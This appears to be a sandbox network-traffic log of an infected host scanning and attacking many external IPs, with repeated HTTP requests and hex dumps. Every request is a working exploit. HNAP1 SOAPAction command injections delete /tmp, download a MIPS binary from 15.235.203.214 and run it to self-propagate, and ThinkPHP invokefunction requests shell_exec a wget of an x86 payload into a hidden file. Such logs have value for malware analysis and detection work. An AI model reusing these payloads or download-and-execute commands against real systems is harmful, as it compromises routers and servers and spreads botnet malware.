                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2192.168.2.1458742117.202.144.1218081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.400645018 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3192.168.2.1443710107.98.138.1388081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.409284115 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4192.168.2.1448184122.148.141.1398081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.417083025 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5192.168.2.1434928124.0.116.1518081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.424062967 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6192.168.2.1457212173.99.45.1848081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.431848049 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7192.168.2.1458108213.86.105.348081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.439333916 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8192.168.2.1459872124.201.188.998081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.444596052 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9192.168.2.145407495.17.124.9980
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.447062016 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10192.168.2.145756414.227.196.598081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.450433016 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11192.168.2.143763295.119.118.20980
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.453732014 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12192.168.2.1456470154.14.145.418081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.457031965 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13192.168.2.143466295.59.134.2480
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.459280014 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14192.168.2.145118472.133.157.1968081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.464610100 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
